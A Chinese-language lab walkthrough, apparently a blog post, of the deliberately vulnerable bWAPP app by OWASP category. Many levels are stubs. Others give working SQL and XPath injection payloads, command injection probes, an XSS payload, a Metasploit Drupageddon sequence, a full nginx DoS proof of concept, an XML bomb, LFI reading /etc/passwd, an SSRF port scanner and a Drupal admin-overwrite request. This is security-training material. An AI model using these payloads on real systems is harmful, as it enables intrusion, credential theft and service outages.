bwapp
- / A1 - Injection /HTML Injection - Reflected (GET)
- HTML Injection - Reflected (POST)
- HTML Injection - Reflected (Current URL)
- HTML Injection - Stored (Blog)
- iFrame Injection
- LDAP Injection (Search)【待开化】
- Mail Header Injection (SMTP)【待开化】
- OS Command Injection
- OS Command Injection - Blind
- PHP Code Injection
- SQL Injection (GET/Select)
- SQL Injection (POST/Search)
- SQL Injection (POST/Select)
- SQL Injection (AJAX/JSON/jQuery)
- SQL Injection (CAPTCHA)
- SQL Injection (Login Form/Hero)
- SQL Injection (Login Form/User)
- SQL Injection (SQLite)
- SQL Injection (Drupal)
- SQL Injection - Stored (Blog)
- SQL Injection - Stored (SQLite)
- SQL Injection - Stored (User-Agent)
- SQL Injection - Stored (XML)
- SQL Injection - Blind - Boolean-Based
- SQL Injection - Blind - Time-Based
- SQL Injection - Blind (SQLite)
- SQL Injection - Blind (Web Services/SOAP)
- XML/XPath Injection (Login Form)
- XML/XPath Injection (Search)
- / A2 - Broken Auth. & Session Mgmt. /
- Broken Authentication - CAPTCHA Bypassing
- Broken Authentication - Forgotten Function
- Broken Authentication - Insecure Login Forms
- Broken Authentication - Logout Management
- Broken Authentication - Password Attacks
- Broken Authentication - Weak Passwords
- Session Management - Administrative Portals
- Session Management - Cookies (HTTPOnly)
- Session Management - Cookies (Secure)
- Session Management - Session ID in URL
- Session Management - Strong Sessions
- / A3 - Cross-Site Scripting (XSS)
- /Cross-Site Scripting - Reflected (GET)
- Cross-Site Scripting - Reflected (POST)
- Cross-Site Scripting - Reflected (JSON)
- Cross-Site Scripting - Reflected (AJAX/JSON)
- Cross-Site Scripting - Reflected (AJAX/XML)
- Cross-Site Scripting - Reflected (Back Button)
- Cross-Site Scripting - Reflected (Custom Header)
- Cross-Site Scripting - Reflected (Eval)
- Cross-Site Scripting - Reflected (HREF)
- Cross-Site Scripting - Reflected (Login Form)
- Cross-Site Scripting - Reflected (phpMyAdmin)
- Cross-Site Scripting - Reflected (PHP_SELF)
- Cross-Site Scripting - Reflected (Referer)
- Cross-Site Scripting - Reflected (User-Agent)
- Cross-Site Scripting - Stored (Blog)
- Cross-Site Scripting - Stored (Change Secret)
- Cross-Site Scripting - Stored (Cookies)
- Cross-Site Scripting - Stored (SQLiteManager)
- Cross-Site Scripting - Stored (User-Agent)
- / A4 - Insecure Direct Object References /(不安全的对象直接引用)
- Insecure DOR (Change Secret)
- Insecure DOR (Reset Secret)
- Insecure DOR (Order Tickets)
- / A5 - Security Misconfiguration /(安全配置错误)
- Arbitrary File Access (Samba)
- Cross-Domain Policy File (Flash)
- Cross-Origin Resource Sharing (AJAX)
- Cross-Site Tracing (XST)跨站跟踪攻击
- Denial-of-Service (Large Chunk Size)
- Denial-of-Service (Slow HTTP DoS)![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/2cd98dae91dc27bec1a01c02e4ffac29.png#pic_center)
- Denial-of-Service (SSL-Exhaustion)
- Denial-of-Service (XML Bomb)
- Insecure FTP Configuration
- Insecure SNMP Configuration
- Insecure WebDAV Configuration
- Local Privilege Escalation (sendpage)
- Local Privilege Escalation (udev)
- Man-in-the-Middle Attack (HTTP)
- Man-in-the-Middle Attack (SMTP)
- Old/Backup & Unreferenced Files
- Robots File
- / A6 - Sensitive Data Exposure /
- Base64 Encoding (Secret)
- BEAST/CRIME/BREACH Attacks
- Clear Text HTTP (Credentials)
- Heartbleed Vulnerability
- Host Header Attack (Reset HTMLrage (Secret)
- POODLE Vulnerability
- SSL 2.0 Deprecated Protocol
- HTML5 Web Storage (Secret)
- Text Files (Accounts)
- / A7 - Missing Functional Level Access Control /
- Directory Traversal - Directories
- Directory Traversal - Files
- Host Header Attack (Cache Poisoning)
- Host Header Attack (Reset Poisoning)
- Local File Inclusion (SQLiteManager)
- Remote & Local File Inclusion (RFI/LFI)
- Restrict Device Access
- Restrict Folder Access
- Server Side Request Forgery (SSRF)
- XML External Entity Attacks (XXE)
- / A8 - Cross-Site Request Forgery (CSRF) /
- Cross-Site Request Forgery (Change Password)
- Cross-Site Request Forgery (Change Secret)
- Cross-Site Request Forgery (Transfer Amount)
- / A9 - Using Known Vulnerable Components /
- Buffer Overflow (Local)
- Buffer Overflow (Remote)
- Drupal SQL Injection (Drupageddon)
- Heartbleed Vulnerability
- PHP CGI Remote Code Execution
- PHP Eval Function
- phpMyAdmin BBCode Tag XSS
- Shellshock Vulnerability (CGI)
- SQLiteManager Local File Inclusion
- SQLiteManager PHP Code Injection
- SQLiteManager XSS
- / A10 - Unvalidated Redirects & Forwards /
- Unvalidated Redirects & Forwards (1)
- Unvalidated Redirects & Forwards (2)
- / Other bugs... /ClickJacking (Movie Tickets)
- Client-Side Validation (Password)
- HTTP Parameter Pollution
- HTTP Response Splitting
- HTTP Verb Tampering
- Information Disclosure - Favicon
- Information Disclosure - Headers
- Information Disclosure - PHP version
- Information Disclosure - Robots File
- Insecure iFrame (Login Form)
- Unrestricted File Upload
- --------------------------- Extras --------------------------
- A.l.M.- No-authentication Mode
- Client Access Policy File
- Cross-Domain Policy File
- Evil 666 Fuzzing Page
- Manual Intervention Required!
- Unprotected Admin Portal
- We Steal Secrets... (html)
- We Steal Secrets... (plain)
- WSDL File (Web Services/SOAP)
---------------------- bWAPP v2.2 -----------------------
/ A1 - Injection /HTML Injection - Reflected (GET)
HTML Injection - Reflected (POST)
换成post
随便搞了,随便写,html随便插
HTML Injection - Reflected (Current URL)
只有在IE浏览器中实现,Chrome和Firefox中HTML参数均为解析出来。
在连接后面随便增添值
HTML Injection - Stored (Blog)
iFrame Injection
iframe是可用于在HTML页面中嵌入一些文件(如文档,视频等)的一项技术。对iframe最简单的解释就是“iframe是一个可以在当前页面中显示其它页面内容的技术”。
通过利用iframe标签对网站页面进行注入,是利用了HTML标签,实际上就是一个阅读器,可以阅读通过协议加载的活服务器本地的文件、视频等。
我们这里发现,他包含了一个robots.txt的文件,我们试试其他喽
LDAP Injection (Search)【待开化】
Mail Header Injection (SMTP)【待开化】
OS Command Injection
其余的绕过见之前的
这样就可以了
OS Command Injection - Blind
盲注我们可以进行延时或者直接字符型,
或者||whoami
`sleep 5 `
PHP Code Injection
直接命令执行即可
Server-Side Includes (SSI) Injection【待开化】
SQL Injection (GET/Search)
我们在输入‘ 后发现报错,然后我们进行orderby,
到8报错
确定回显位置
查询数据库,其余和正常查询一致
SQL Injection (GET/Select)
数字型的,直接注入即可,同上
SQL Injection (POST/Search)
我们尝试I‘
发现报错
那么我们想办法闭合他,
I%’ #
这样我们就能闭合并查询出东西
当然,如果有报错,我们还可以使用报错注入
SQL Injection (POST/Select)
同上,只不过变成了select的,post抓包修改一样的
SQL Injection (AJAX/JSON/jQuery)
ajax他是一个异步通讯,能够在网页不刷新的情况下,刷新网页内部的东西
而它的返回值一般是json/xml格式的,jQuery中提供实现ajax的方法
从sqli_10-2获取了json,
10-2这里可以存在注入
因为是异步的嘛,所以我们在他的前台输入即可,7可以,8直接查询不到
-a%' union select 1,database(),(group_concat(table_name)),4,5,6,7 from information_schema.tables where table_schema='bWAPP' #
SQL Injection (CAPTCHA)
(无法使用,不知道是我的问题还是。。)
SQL Injection (Login Form/Hero)
![在这里插入图片描述](https://img-blog.csdnimg.cn/20201023173256322.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2h4aHhoeGh4eA==,size_16,color_FFFF
我们输入4,仍然可以注入
我们输入5
说明只有四列
找到回显
这里有报错的话,我们直接报错注入
SQL Injection (Login Form/User)
我们发现有报错,,但是没有找到任何可以回显的地方
发现无法判断, 因为前端回显的结果只有当密码(第二个if语句)也正确时才会显示。
因此无法使用order by 判断字段数 (判断注入点是为了用order by来得到字段数)
但是可以直接通过联合查询得到字段数:
但是又无法判断, 因为前端回显的结果只有当密码(第二个if语句)也正确时才会显示。
我们去数据库查询看看
我们发现,他的第三位是md5加密的
由于用户名和密码是分开进行判断的, 为了能够回显出报错信息, 需要注入的联合查询字段(顺序为3)与输入的密码相等
比如, 注入的联合查询为:
用户名: ' union select 1,2,"77de68daecd823babbb58edb1c8e14d7106e83bb",4,5,6,7,8,9 #
密码 : 3
SQL Injection (SQLite)
首先需要安装SQLite插件:
apt-get install sqlite3
apt-get install php5-sqlite
然后重启一下apache:
service apache2 restart
注入单引号, 只会报错 Error: HY000, 可能是SQLite的报错标注:
根据查询功能, 很明显为模糊匹配:
于是得出sql语句为:
select * from books where title='%$title%';
判断注入点
Iron%' and 1=1 --
注意在SQLite中, 注释符为: --
判断字段数
Iron%' order by 6 --
判断字段显示顺序
123%' union select 1,2,3,4,5,6 --
爆所有表
123%' union select 1,sqlite_version(),name,4,5,6 from sqlite_master --
users表的字段
123%' union select 1,sqlite_version(),sql,4,5,6 from sqlite_master --
通过sql可以查看建表语句, 从而得到字段属性:
取值
123%' union select 1,2,login,password,5,6 from users --
因为环境问题,转自
https://blog.csdn.net/angry_program/article/details/104545171#0x07%E3%80%81SQL%20Injection%20%28Login%20Form%2FUser%29
SQLite 介绍
SQLite含有一张内置表“sqlite_master”,表里存储着type、name、tbl_name、rootpage、sql五个字段。
type列记录了项目的类型,如table、index、view、trigger
tbl_name字段记录所从属的表名,如索引所在的表名。对于表来说,该列就是表名本身;
name字段记录了项目的名称,如表名、索引名等;
rootpage记录项目在数据库页中存储的编号。对于视图和触发器,该列值为0或者NULL
sql存放着所有表的创建语句,即表的结构。
SQL Injection (Drupal)
只有bee-box可以使用,所以 我们只演示,并无结果
search drupal
使用CVE-2014-3704对应的攻击模块:
use exploit/multi/http/drupal_drupageddon
设置Drupal网站路径:
set targeturi /drupal/
所定攻击的ip和端口:
set RHOSTS 192.168.10.10
set rport 8080
发动攻击, 拿到shell:
exploit
前情提要
CVE-2014-3704:
由于expandArguments()函数没有正确构造准备好的语句,这使得远程攻击者能够通过包含精心编制的手工语句进行SQL注入攻击。影响Drupal版本在7.x~1.32。
Drupal是一款开源内容管理系统(CMS),用户多达100万以上(包括政府、电子零售、企业组织、金融机构等),除非已经安装了针对Drupalgeddon 漏洞的安全补丁,否则,所有用户都会面临该漏洞的严重威胁。
SQL Injection - Stored (Blog)
我们先看看报错,
然后我们闭合他
insert into blog(date,entry,owner) values(now(), '$entry', 'bee');
注入点为entry处, 可以将前面的values() 闭合掉, 然后加上注入内容即可:
SQL Injection - Stored (SQLite)
(暂时无法使用,但是和上一关类似,只不过语法变成了sqlite的)
SQL Injection - Stored (User-Agent)
我们在UA处注入,发现了报错,
那么我们紧接着闭合,
我们需要闭合他的内部函数,回显在ip这里
INSERT INTO blog (date, user_agent, ip_address) VALUES(now(), '$user-agent','$ip');
SQL Injection - Stored (XML)
点击会发送一次信息
我们发现这里会改写文字
得到回显之后, 接下来就是判断sql语句, 由于是写入网页的bee值, 那么猜测为update语句:
UPDATE users SET secret = '$secret' WHERE login = '$login';
因为这里有报错,我们试试报错注入
SQL Injection - Blind - Boolean-Based
注释掉后,发现回显不同,说明可以注入
这里我们输入3的时候,发现,不存在,
bwapp 正好是5个,那么,5时,发现存在
SQL Injection - Blind - Time-Based
我们发现,这里可以sleep(5)说明这里存在延时注入
这里,很明显不正确,
所以当length长度为5时,回显正确
SQL Injection - Blind (SQLite)
SQL Injection - Blind (Web Services/SOAP)
XML/XPath Injection (Login Form)
我们加一个单引号,发现xmli报错,说明这里存在xml注入
查看源码得知是通过读取heroes.xml文件的内容, 并且通过xpath寻找用户的账户和密码来验证登录:
heroes.xml文件, 是一个xml文件, 里面包含了用户名和登录密码等信息:
根据查询语句
123' or 1=1 or ''='
$result = $xml->xpath("/heroes/hero[login='"123' or 1=1 or ''=' "' and password='" . $password . "']");
构造永真,,万能密码登录
原理
XPath注入的原理其实和sql注入很像, XPath注入攻击主要是通过构建特殊的输入,这些输入往往是XPath语法中的一些组合,这些输入将作为参数传入Web 应用程序,通过执行XPath查询而执行入侵者想要的操作,
但是,注入的对象不是数据库users表了,而是一个存储数据的XML文件。攻击者可以获取 XML 数据的组织结构,或者访问在正常情况下不允许访问的数据,如果 XML 数据被用于用户认证,那么攻击者就可以提升他的权限。因为xpath不存在访问控制,所以我们不会遇到许多在SQL注入中经常遇到的访问限制。
XML 中没有访问控制或者用户认证,如果用户有权限使用 XPath 查询,并且之间没有防御系统或者查询语句没有被防御系统过滤,那么用户就能够访问整个 XML 文档。 注入出现的位置也就是cookie,headers,request parameters/input等。
XML/XPath Injection (Search)
单引号报错,说明是xml注入
查看源码
//hero[contains(genre, '$genre')]/movie
大概表示所有属性值genre为$genre的hero标签下的movie元素值
这里的genre参数是可控的, 攻击者可以构造恶意xpath语句来获取整个xml文档的信息:
比如, 通过闭合$genre前面的单引号, 然后在后面选取hero的password元素值; 最后用一个 | 运算符将movie闭合好
horror')]/password | xx[contains(a,'
注入后的xpath语句为:
//hero[contains(genre, 'horror')]/password | xx[contains(a,'')]/movie
/ A2 - Broken Auth. & Session Mgmt. /
Broken Authentication - CAPTCHA Bypassing
验证码绕过,burp爆破即可
只需要填写一次验证码
Broken Authentication - Forgotten Function
同样,burp爆破
Broken Authentication - Insecure Login Forms
很明显,这里是信息泄露
Broken Authentication - Logout Management
switch($_COOKIE["security_level"])
{
case "0" :
// Do nothing
break;
case "1" :
// Destroys the session
session_destroy();
break;
case "2" :
// Unsets all of the session variables
$_SESSION = array();
// Destroys the session
session_destroy();
break;
default :
// Do nothing
break;
}
这里分为三个等级,
low 退出登录,session仍然可用
medium 退出登录时,销毁session
high时,清空session,销毁session
Broken Authentication - Password Attacks
同样的burp爆破
Broken Authentication - Weak Passwords
弱口令爆破
Session Management - Administrative Portals
一个管理门户,这里对是否是admin有一个0/1的界限
Session Management - Cookies (HTTPOnly)
同样是三个等级的不同,
low没有开启httponly
可以获取到cookie
但是medium 开启了,js无法获取
high, 按时间进行刷新cookie ,服务器端获取的也不一样
Session Management - Cookies (Secure)
Session Management - Session ID in URL
session,存在了url中
Session Management - Strong Sessions
session需要进行加密,
low 无加密
medium需要https
/ A3 - Cross-Site Scripting (XSS)
/Cross-Site Scripting - Reflected (GET)
无过滤,随便弹,
medium 使用addslashes()函数来进行过滤
high 使用 htmlspecialchars()函数来进行过滤
Cross-Site Scripting - Reflected (POST)
同get
Cross-Site Scripting - Reflected (JSON)
json 是在页面内加载的,我们将他闭合即可
medium和high加入了htmlspecialchars()函数
Cross-Site Scripting - Reflected (AJAX/JSON)
ajax 异步通讯的
我们使用其他标签即可
<img src = x onerror =alert(1)>
Cross-Site Scripting - Reflected (AJAX/XML)
Cross-Site Scripting - Reflected (Back Button)
Cross-Site Scripting - Reflected (Custom Header)
Cross-Site Scripting - Reflected (Eval)
Cross-Site Scripting - Reflected (HREF)
Cross-Site Scripting - Reflected (Login Form)
Cross-Site Scripting - Reflected (phpMyAdmin)
Cross-Site Scripting - Reflected (PHP_SELF)
Cross-Site Scripting - Reflected (Referer)
Cross-Site Scripting - Reflected (User-Agent)
Cross-Site Scripting - Stored (Blog)
Cross-Site Scripting - Stored (Change Secret)
Cross-Site Scripting - Stored (Cookies)
Cross-Site Scripting - Stored (SQLiteManager)
Cross-Site Scripting - Stored (User-Agent)
/ A4 - Insecure Direct Object References /(不安全的对象直接引用)
Insecure DOR (Change Secret)
有一个隐藏的input,我们可以直接修改其他人的密码
Insecure DOR (Reset Secret)
可以重置其他人的密码,同上,直接修改
Insecure DOR (Order Tickets)
可以直接进行修改
/ A5 - Security Misconfiguration /(安全配置错误)
Arbitrary File Access (Samba)
本机连接有问题,但是我们选择tmp文件,因为tmp一般可写
Cross-Domain Policy File (Flash)
本题说的时 Flash的跨域访问策略问题
对应的文件是 crossdomain.xml,如果该文件的访问策略设置不正确,可以导致任意远程Flash文件读取服务器文件
下图中可以看到,允许任意域的Flash访问
在evil文件夹找到xdx.as,重新填入对应的服务器地址
用Adobe Flash CS3及以上从新编译一个新的xdx.swf文件,并加入xdx.as这个文件
将编译好的xdx.swf与xdx.php放到服务器的另一个文件夹内。
先登录bWAPP页面,然后在另一个服务器上请求xdx.php,最终会返回secret的内容
adobe flash环境需要
转自:https://www.jianshu.com/p/495d2ea4cef1
Cross-Origin Resource Sharing (AJAX)
本题讲的是AJAX的跨域资源请求问题
大佬:
https://www.cnblogs.com/demingblog/p/8393511.html
这里使用官方给的evil攻击脚本,
Cross-Site Tracing (XST)跨站跟踪攻击
Denial-of-Service (Large Chunk Size)
# Exploit Title: nginx v1.3.9-1.4.0 DOS POC (CVE-2013-2028)
# Date: 16.05.2013
# Exploit Author: Mert SARICA - mert [ . ] sarica [ @ ] gmail [ . ] com - http://www.mertsarica.com
# Minor customizations by Malik Mesellem (@MME_IT)
# Vendor Homepage: http://nginx.org/
# Software Link: http://nginx.org/download/nginx-1.4.0.tar.gz
# Version: 1.3.9-1.4.0
# Tested on: Kali Linux & Windows XP (nginx v1.4.0)
# CVE : CVE-2013-2028
import httplib
import time
import socket
import sys
import os
# Vars & Defs
debug = 0
dos_packet = 0xFFFFFFFFFFFFFFEC
socket.setdefaulttimeout(1)
packet = 0
def chunk(data, chunk_size):
chunked = ""
chunked += "%s\r\n" % (chunk_size)
chunked += "%s\r\n" % (data)
chunked += "0\r\n\r\n"
return chunked
if sys.platform == 'linux-i386' or sys.platform == 'linux2':
os.system("clear")
elif sys.platform == 'win32':
os.system("cls")
else:
os.system("cls")
print "======================================================================"
print u"nginx v1.3.9-1.4.0 DOS POC (CVE-2013-2028) [http://www.mertsarica.com]"
print "======================================================================"
if len(sys.argv) < 2:
print "Usage: python nginx_dos.py [target ip:port]\n"
print "Example: python nginx_dos.py 127.0.0.1:8080\n"
sys.exit(1)
else:
host = sys.argv[1].lower()
while packet <= 66:
body = "beezzzzzzzzzz"
chunk_size = hex(dos_packet + 1)[3:]
chunk_size = ("F" + chunk_size[:len(chunk_size)-1]).upper()
if debug:
print "data length:", len(body), "chunk size:", chunk_size[:len(chunk_size)]
try:
con = httplib.HTTPConnection(host)
url = "/bWAPP/portal.php"
con.putrequest('POST', url)
con.putheader('User-Agent', 'bWAPP')
con.putheader('Accept', '*/*')
con.putheader('Transfer-Encoding', 'chunked')
con.putheader('Content-Type', 'application/x-www-form-urlencoded')
con.endheaders()
con.send(chunk(body, chunk_size[:len(chunk_size)]))
except:
print "Connection error!"
sys.exit(1)
try:
resp = con.getresponse()
print(resp.status, resp.reason)
except:
print "[*] Knock knock, is anybody there ? (" + str(packet) + "/66)"
packet = packet + 1
con.close()
print "[+] Done!"
自带的攻击脚本
发起攻击
响应时间过长
Denial-of-Service (Slow HTTP DoS)
0d0a 相当于 \r \n
一直再转
Denial-of-Service (SSL-Exhaustion)
Denial-of-Service (XML Bomb)
xml实际就是一个本地的简单数据库
我们抓包,这是一个xml的一个语句
如上一步分是dtd,
ENTITY 定义一个实体,
名字叫lol 内容是lol
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
lol1 内包含了十个lol
lol2中包含了十个lol1 ,一个lol1包含十个lol
指数型增长
如上几个是dos ,这里不方便打自己的虚拟机,就找一些其他 截屏了
Insecure FTP Configuration
暂无环境
Insecure SNMP Configuration
暂无环境
Insecure WebDAV Configuration
暂无环境
Local Privilege Escalation (sendpage)
暂无环境
Local Privilege Escalation (udev)
暂无环境
Man-in-the-Middle Attack (HTTP)
如上正在配置,
Man-in-the-Middle Attack (SMTP)
Old/Backup & Unreferenced Files
旧的,或者备份文件的目录,
Robots File
robots.txt敏感文件暴露
/ A6 - Sensitive Data Exposure /
Base64 Encoding (Secret)
提示我们cookie中存在base
BEAST/CRIME/BREACH Attacks
需要box环境
Clear Text HTTP (Credentials)
很明显,明文传输
Heartbleed Vulnerability
这个想必大家都有耳闻,大名鼎鼎的心脏出血、
适用版本
OpenSSL1.0.1
当然,msf就能够进行利用
Host Header Attack (Reset HTMLrage (Secret)
POODLE Vulnerability
SSL 2.0 Deprecated Protocol
HTML5 Web Storage (Secret)
直接访问,我们看到了密码
中级的密码
Text Files (Accounts)
插入了一个文件的账户密码
/ A7 - Missing Functional Level Access Control /
Directory Traversal - Directories
直接可以访问文件
Directory Traversal - Files
目录穿越
Host Header Attack (Cache Poisoning)
缓存中毒
Host Header Attack (Reset Poisoning)
由于不能发送邮件,这里转一篇如何进行攻击
当我们进行重置密码的时候
发现他重置密码的ip为localhost
那么我们如果进行修改的话
换成自己的ip
这里就成了自己的ip
Local File Inclusion (SQLiteManager)
暂时无beebox
GET /home/sqlite/ HTTP/1.0
[...]
Cookie: PHPSESSID=[...];SQLiteManager_currentTheme=../../../../../../../../../../../../../etc/passwd%00;
SQLiteManager_currentLangue=deleted
利用:https://www.securityfocus.com/bid/22727/exploit
Remote & Local File Inclusion (RFI/LFI)
payload:
rlfi.php?language=http://www.baidu.com&action=go
Restrict Device Access
需要特殊的设备,那么修改UA头即可
Restrict Folder Access
low可以随意访问
htaccess 在其他版本中,起了限制作用,都不能进行访问了
Server Side Request Forgery (SSRF)
详细的ssrf
https://blog.csdn.net/u010726042/article/details/77806775
bwapp自带的ssrf扫描端口脚本
<?php
/*
bWAPP, or a buggy web application, is a free and open source deliberately insecure web application.
It helps security enthusiasts, developers and students to discover and to prevent web vulnerabilities.
bWAPP covers all major known web vulnerabilities, including all risks from the OWASP Top 10 project!
It is for educational purposes only.
Enjoy!
Malik Mesellem
Twitter: @MME_IT
© 2013 MME BVBA. All rights reserved.
*/
echo "<script>alert(\"U 4r3 0wn3d by MME!!!\");</script>";
if(isset($_REQUEST["ip"]))
{
//list of port numbers to scan
$ports = array(21, 22, 23, 25, 53, 80, 110, 1433, 3306);
$results = array();
foreach($ports as $port)
{
if($pf = @fsockopen($_REQUEST["ip"], $port, $err, $err_string, 1))
{
$results[$port] = true;
fclose($pf);
}
else
{
$results[$port] = false;
}
}
foreach($results as $port=>$val)
{
$prot = getservbyport($port,"tcp");
echo "Port $port ($prot): ";
if($val)
{
echo "<span style=\"color:green\">OK</span><br/>";
}
else
{
echo "<span style=\"color:red\">Inaccessible</span><br/>";
}
}
}
?>
XML External Entity Attacks (XXE)
http://www.youknowi.xin/xxe%e6%94%bb%e5%87%bb/
/ A8 - Cross-Site Request Forgery (CSRF) /
详解
https://www.cnblogs.com/wangyuyu/p/3388169.html
Cross-Site Request Forgery (Change Password)
Cross-Site Request Forgery (Change Secret)
Cross-Site Request Forgery (Transfer Amount)
/ A9 - Using Known Vulnerable Components /
使用已知的脆弱的部件
Buffer Overflow (Local)
本地缓存溢出
(bee-box only)暂时未安装
Buffer Overflow (Remote)
Drupal SQL Injection (Drupageddon)
POST /drupal-7.31/?q=node&destination=node HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/drupal-7.31/
Cookie: Drupal.toolbar.collapsed=0; Drupal.tableDrag.showWeight=0; has_js=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 231
name[0%20;update+users+set+name%3d'owned'+,+pass+%3d+'$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld'+where+uid+%3d+'1';;#%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in
测试代码
Heartbleed Vulnerability
(CVE-2014-0160)
心脏滴血,太出名了
PHP CGI Remote Code Execution
box专享
PHP Eval Function
phpMyAdmin BBCode Tag XSS
CVE-2016-9862
影响版本
phpMyAdmin phpMyAdmin 4.6.x
Shellshock Vulnerability (CGI)
SQLiteManager Local File Inclusion
SQLiteManager PHP Code Injection
SQLiteManager XSS
/ A10 - Unvalidated Redirects & Forwards /
Unvalidated Redirects & Forwards (1)
未验证的重定向和转发(已经从top10 中移除)
登录时存在跳转网页,我们就可以进行抓包修改,可以修改到我们想要的钓鱼网站
Unvalidated Redirects & Forwards (2)
/ Other bugs… /ClickJacking (Movie Tickets)
Client-Side Validation (Password)
前端绕过 设置弱密码
那么既然是客户端校验,就很好解决了,我们在源码中驱动onsubmit或者响应包里删除js部分可绕过限制,实现修改成简单密码形式
HTTP Parameter Pollution
href=hpp-3.php?movie=1&name=meetsec&movie=2&action=vote
http参数污染,在之前有介绍,每个浏览器对于参数污染的部分不同
这里他会投票给了2号,一号就相当于没有了
HTTP Response Splitting
HTTP拆分攻击
HTTP Verb Tampering
HVT,http动作窜改漏洞,也就是修改get,post,trace,put,move,delete等
其实有些时候,通过改变不同方法可以用来过waf
或者csrf中构造poc,如果存在本漏洞,可以直接在url中提交参数,点击即中招
Information Disclosure - Favicon
信息泄漏,本题是指有时候页面图标会泄漏web框架信息
Information Disclosure - Headers
这题告诉我们,响应包里会泄漏服务器的相关信息,攻击者可能利用相关信息找到对应漏洞针对性攻击
要么屏蔽banner信息,要么混淆
Information Disclosure - PHP version
Information Disclosure - Robots File
robots.txt会泄漏网站敏感路径信息
Insecure iFrame (Login Form)
不安全的登陆框
Unrestricted File Upload
不加限制的上传
他针对后缀没有任何的限制
--------------------------- Extras --------------------------
A.l.M.- No-authentication Mode
没有身份验证模式
Client Access Policy File
客户端访问策略文件
clientaccesspolicy.xml<-微软公司发布Silverlight特有的跨域策略文件
Cross-Domain Policy File
跨域个人文件
跨域策略文件是一种 XML 文档,旨在为 Web 客户端(比如 Adobe Flash Player 或 Adobe Acrobat,但不限于这两类客户端)授予跨域处理数据的权限。
跨域策略文件的配置方法
一个服务器想要访问其他域的服务器时就要跨域,若想要访问成功,被访问服务器要设置允许访问权限,这个权限设置就是跨域策略文件(crossdomain.xml)的存在意义 了
allow-access-from:授权发出请求的域从目标中读取数据,*为多个域设置访问权限
Evil 666 Fuzzing Page
模糊测试
https://www.freebuf.com/column/157277.html
Manual Intervention Required!
人工干预验证码(应该是)
Unprotected Admin Portal
(未被保护的管理后台)
We Steal Secrets… (html)
我们发现,只要登录就会显示密码
We Steal Secrets… (plain)
WSDL File (Web Services/SOAP)
WebService之Soap服务
https://blog.csdn.net/LoveCarpenter/article/details/53945697